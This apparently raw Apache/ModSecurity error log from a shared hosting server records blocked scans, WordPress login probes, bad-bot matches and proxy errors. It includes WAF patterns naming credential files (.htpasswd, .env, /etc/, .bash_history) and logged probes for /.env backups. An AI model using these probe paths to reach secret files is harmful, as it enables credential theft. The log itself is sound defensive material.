[Tue May 26 14:48:11.221286 2026] [security2:error] [pid 648203:tid 648440] [client 45.154.98.38:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cpanel.ndequipments.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahVlU7EQDDtxJNiDrdTW_AAAAPA"]
[Tue May 26 14:48:11.536335 2026] [security2:error] [pid 648203:tid 648377] [client 45.154.98.38:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cpanel.ndequipments.com"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahVlU7EQDDtxJNiDrdTXBwAAALE"]
[Tue May 26 14:48:11.797702 2026] [security2:error] [pid 648203:tid 648355] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlU7EQDDtxJNiDrdTXAwAAAJs"]
[Tue May 26 14:48:11.852094 2026] [security2:error] [pid 648203:tid 648395] [client 45.154.98.38:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cpanel.ndequipments.com"] [uri "/sito/wp-includes/wlwmanifest.xml"] [unique_id "ahVlU7EQDDtxJNiDrdTXHwAAAMM"]
[Tue May 26 14:48:12.455635 2026] [security2:error] [pid 648203:tid 648453] [client 216.26.250.32:12963] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlU7EQDDtxJNiDrdTXBAAAAP0"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:13.456299 2026] [security2:error] [pid 648203:tid 648378] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlVbEQDDtxJNiDrdTXTwAAALI"]
[Tue May 26 14:48:13.755667 2026] [security2:error] [pid 648203:tid 648348] [client 20.12.194.227:63747] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.grappyfilms.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVlVbEQDDtxJNiDrdTXZAAAAJQ"]
[Tue May 26 14:48:13.755800 2026] [security2:error] [pid 648203:tid 648348] [client 20.12.194.227:63747] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.grappyfilms.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVlVbEQDDtxJNiDrdTXZAAAAJQ"]
[Tue May 26 14:48:13.876796 2026] [security2:error] [pid 648203:tid 648441] [client 20.12.194.227:31670] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.grappyfilms.com.md-74.webhostbox.net"] [uri "/about.php"] [unique_id "ahVlVbEQDDtxJNiDrdTXbgAAAPE"]
[Tue May 26 14:48:13.876900 2026] [security2:error] [pid 648203:tid 648441] [client 20.12.194.227:31670] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.grappyfilms.com.md-74.webhostbox.net"] [uri "/about.php"] [unique_id "ahVlVbEQDDtxJNiDrdTXbgAAAPE"]
[Tue May 26 14:48:14.587093 2026] [security2:error] [pid 648203:tid 648458] [client 209.50.162.1:28693] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlVbEQDDtxJNiDrdTXXQAAAQI"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:14.853942 2026] [security2:error] [pid 648203:tid 648437] [client 74.7.241.191:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "503"] [hostname "shahvishaal.com"] [uri "/index.php"] [unique_id "ahVlVLEQDDtxJNiDrdTXLwAAAO0"]
[Tue May 26 14:48:14.854737 2026] [security2:error] [pid 648203:tid 648353] [client 74.7.241.191:44850] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "503"] [hostname "shahvishaal.com"] [uri "/robots.txt"] [unique_id "ahVlVLEQDDtxJNiDrdTXLQAAmWQ"]
[Tue May 26 14:48:15.820471 2026] [security2:error] [pid 648203:tid 648302] [remote 5.42.158.148:57032] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahVlV7EQDDtxJNiDrdTXoQAAw2I"]
[Tue May 26 14:48:15.919994 2026] [security2:error] [pid 648203:tid 648377] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlV7EQDDtxJNiDrdTXnQAAALE"]
[Tue May 26 14:48:16.208736 2026] [security2:error] [pid 648203:tid 648412] [client 114.119.139.43:25143] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "rainadelproperties.com"] [uri "/wp-content/uploads/2017/04/house-demo2-45-143x83.jpg"] [unique_id "ahVlWLEQDDtxJNiDrdTXugAAANQ"], referer: https://rainadelproperties.com/wp-content/uploads/2017/04/house-demo2-45-143x83.jpg
[Tue May 26 14:48:16.749039 2026] [security2:error] [pid 648203:tid 648394] [client 216.26.227.165:44845] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlV7EQDDtxJNiDrdTXogAAAMI"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:18.469964 2026] [security2:error] [pid 648203:tid 648411] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlWrEQDDtxJNiDrdTX9wAAANM"]
[Tue May 26 14:48:18.872886 2026] [security2:error] [pid 648203:tid 648429] [client 216.26.234.93:22621] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlWbEQDDtxJNiDrdTX8QAAAOU"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:19.112614 2026] [security2:error] [pid 648203:tid 648400] [client 162.244.144.154:26883] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVlWrEQDDtxJNiDrdTYDQAAAMg"], referer: https://anujtradingco.com
[Tue May 26 14:48:19.198144 2026] [security2:error] [pid 648203:tid 648340] [client 85.208.96.204:51832] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/flipping-fridays/list/"] [unique_id "ahVlW7EQDDtxJNiDrdTYJwAAAIw"]
[Tue May 26 14:48:19.198278 2026] [security2:error] [pid 648203:tid 648340] [client 85.208.96.204:51832] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/flipping-fridays/list/"] [unique_id "ahVlW7EQDDtxJNiDrdTYJwAAAIw"]
[Tue May 26 14:48:20.269086 2026] [security2:error] [pid 648203:tid 648427] [client 216.73.217.72:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.ndequipments.com"] [uri "/index.php"] [unique_id "ahVlXLEQDDtxJNiDrdTYTQAA4wU"]
[Tue May 26 14:48:20.654553 2026] [security2:error] [pid 648203:tid 648376] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlXLEQDDtxJNiDrdTYTAAAALA"]
[Tue May 26 14:48:21.071385 2026] [security2:error] [pid 648203:tid 648441] [client 209.50.169.235:39873] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlW7EQDDtxJNiDrdTYRQAAAPE"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:22.402945 2026] [security2:error] [pid 648203:tid 648427] [client 64.89.163.250:58835] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "anujtradingco.com"] [uri "/.env"] [unique_id "ahVlXrEQDDtxJNiDrdTYhwAAAOM"]
[Tue May 26 14:48:22.447212 2026] [security2:error] [pid 648203:tid 648368] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlXbEQDDtxJNiDrdTYfQAAAKg"]
[Tue May 26 14:48:23.286703 2026] [security2:error] [pid 648203:tid 648355] [client 45.3.55.147:9491] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlXrEQDDtxJNiDrdTYhAAAAJs"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:24.480966 2026] [security2:error] [pid 648203:tid 648222] [remote 94.76.235.103:34758] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-login.php"] [unique_id "ahVlYLEQDDtxJNiDrdTYzgAApRI"]
[Tue May 26 14:48:25.247032 2026] [security2:error] [pid 648203:tid 648372] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlYLEQDDtxJNiDrdTY4AAAAKw"]
[Tue May 26 14:48:25.515282 2026] [security2:error] [pid 648203:tid 648369] [client 216.26.237.252:29101] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlYLEQDDtxJNiDrdTYzwAAAKk"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:26.925701 2026] [security2:error] [pid 648203:tid 648339] [client 158.173.20.27:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVlYrEQDDtxJNiDrdTZHgAAAIs"]
[Tue May 26 14:48:27.583034 2026] [security2:error] [pid 648203:tid 648449] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlY7EQDDtxJNiDrdTZJQAAAPk"]
[Tue May 26 14:48:27.620772 2026] [security2:error] [pid 648203:tid 648369] [client 158.173.20.27:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVlY7EQDDtxJNiDrdTZMwAAqR8"]
[Tue May 26 14:48:28.172771 2026] [security2:error] [pid 648203:tid 648436] [client 146.174.165.76:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlY7EQDDtxJNiDrdTZPgAAAOw"]
[Tue May 26 14:48:28.266472 2026] [security2:error] [pid 648203:tid 648236] [remote 158.173.20.27:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 27.20.173.158.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/wp-admin/install.php"] [unique_id "ahVlZLEQDDtxJNiDrdTZTgAA9SA"]
[Tue May 26 14:48:28.266712 2026] [security2:error] [pid 648203:tid 648445] [client 158.173.20.27:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "ndequipments.com"] [uri "/wp-admin/install.php"] [unique_id "ahVlZLEQDDtxJNiDrdTZTgAA9SA"]
[Tue May 26 14:48:28.478520 2026] [security2:error] [pid 648203:tid 648218] [remote 158.173.20.27:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 27.20.173.158.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/wp-admin/setup-config.php"] [unique_id "ahVlZLEQDDtxJNiDrdTZVgAA4Q4"]
[Tue May 26 14:48:28.478737 2026] [security2:error] [pid 648203:tid 648425] [client 158.173.20.27:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "ndequipments.com"] [uri "/wp-admin/setup-config.php"] [unique_id "ahVlZLEQDDtxJNiDrdTZVgAA4Q4"]
[Tue May 26 14:48:28.508476 2026] [security2:error] [pid 648203:tid 648426] [client 45.148.10.5:61838] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com.onesoft.in"] [uri "/.env.backup"] [unique_id "ahVlZLEQDDtxJNiDrdTZVwAAAOI"]
[Tue May 26 14:48:28.883647 2026] [security2:error] [pid 648203:tid 648346] [client 104.207.53.246:65255] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlY7EQDDtxJNiDrdTZNwAAAJI"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:29.333263 2026] [security2:error] [pid 648203:tid 648384] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlZLEQDDtxJNiDrdTZYwAAALg"]
[Tue May 26 14:48:29.905286 2026] [security2:error] [pid 648203:tid 648242] [remote 3.208.180.187:48726] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 187.180.208.3.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVlZbEQDDtxJNiDrdTZhQAAsSY"]
[Tue May 26 14:48:30.663119 2026] [security2:error] [pid 648203:tid 648254] [remote 209.38.251.46:48152] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 46.251.38.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahVlZrEQDDtxJNiDrdTZogAAhzI"]
[Tue May 26 14:48:31.027098 2026] [security2:error] [pid 648203:tid 648383] [client 65.111.30.218:48761] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlZbEQDDtxJNiDrdTZiQAAALc"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:31.921892 2026] [security2:error] [pid 648203:tid 648338] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlZ7EQDDtxJNiDrdTZ6QAAAIo"]
[Tue May 26 14:48:32.037738 2026] [security2:error] [pid 648203:tid 648339] [client 165.140.119.146:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVlZ7EQDDtxJNiDrdTZ_gAAAIs"], referer: https://www.bloggertarget.com
[Tue May 26 14:48:32.502802 2026] [security2:error] [pid 648203:tid 648303] [remote 88.198.91.116:55758] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.91.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahVlaLEQDDtxJNiDrdTaEQAA1mM"]
[Tue May 26 14:48:33.093195 2026] [security2:error] [pid 648203:tid 648420] [client 74.249.173.207:2565] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/wk/index.php"] [unique_id "ahVlabEQDDtxJNiDrdTaIQAAANw"]
[Tue May 26 14:48:33.154602 2026] [security2:error] [pid 648203:tid 648423] [client 216.26.239.147:31587] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlaLEQDDtxJNiDrdTaAwAAAN8"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:34.239234 2026] [security2:error] [pid 648203:tid 648345] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlabEQDDtxJNiDrdTaNwAAAJE"]
[Tue May 26 14:48:35.279074 2026] [security2:error] [pid 648203:tid 648384] [client 216.26.242.84:20827] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlarEQDDtxJNiDrdTaPQAAALg"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:35.431112 2026] [proxy:error] [pid 648203:tid 648444] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:35.431169 2026] [proxy_http:error] [pid 648203:tid 648444] [client 5.255.125.104:52330] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:35.431783 2026] [proxy:error] [pid 648203:tid 648444] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:35.431825 2026] [proxy_http:error] [pid 648203:tid 648444] [client 5.255.125.104:52330] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:36.003232 2026] [security2:error] [pid 648203:tid 648389] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVla7EQDDtxJNiDrdTacgAAAL0"]
[Tue May 26 14:48:36.183757 2026] [proxy:error] [pid 648203:tid 648342] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:36.183811 2026] [proxy_http:error] [pid 648203:tid 648342] [client 5.255.125.104:45032] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:36.184640 2026] [proxy:error] [pid 648203:tid 648342] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:36.184682 2026] [proxy_http:error] [pid 648203:tid 648342] [client 5.255.125.104:45032] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.324715 2026] [security2:error] [pid 648203:tid 648386] [client 45.148.10.5:35036] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com.onesoft.in"] [uri "/.env.old"] [unique_id "ahVlbbEQDDtxJNiDrdTaugAAALo"]
[Tue May 26 14:48:37.378022 2026] [security2:error] [pid 648203:tid 648387] [client 209.50.161.222:22233] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlbLEQDDtxJNiDrdTakgAAALs"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:37.749701 2026] [proxy:error] [pid 648203:tid 648339] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.749777 2026] [proxy_http:error] [pid 648203:tid 648339] [client 5.255.125.104:52356] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.750414 2026] [proxy:error] [pid 648203:tid 648339] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.750470 2026] [proxy_http:error] [pid 648203:tid 648339] [client 5.255.125.104:52356] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.761510 2026] [proxy:error] [pid 648203:tid 648374] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.761601 2026] [proxy_http:error] [pid 648203:tid 648374] [client 5.255.125.104:52606] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.761790 2026] [proxy:error] [pid 648203:tid 648428] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.761868 2026] [proxy_http:error] [pid 648203:tid 648428] [client 5.255.125.104:52652] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.762047 2026] [proxy:error] [pid 648203:tid 648458] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.762142 2026] [proxy_http:error] [pid 648203:tid 648458] [client 5.255.125.104:52560] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.762229 2026] [proxy:error] [pid 648203:tid 648374] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.762267 2026] [proxy_http:error] [pid 648203:tid 648374] [client 5.255.125.104:52606] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.762472 2026] [proxy:error] [pid 648203:tid 648428] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
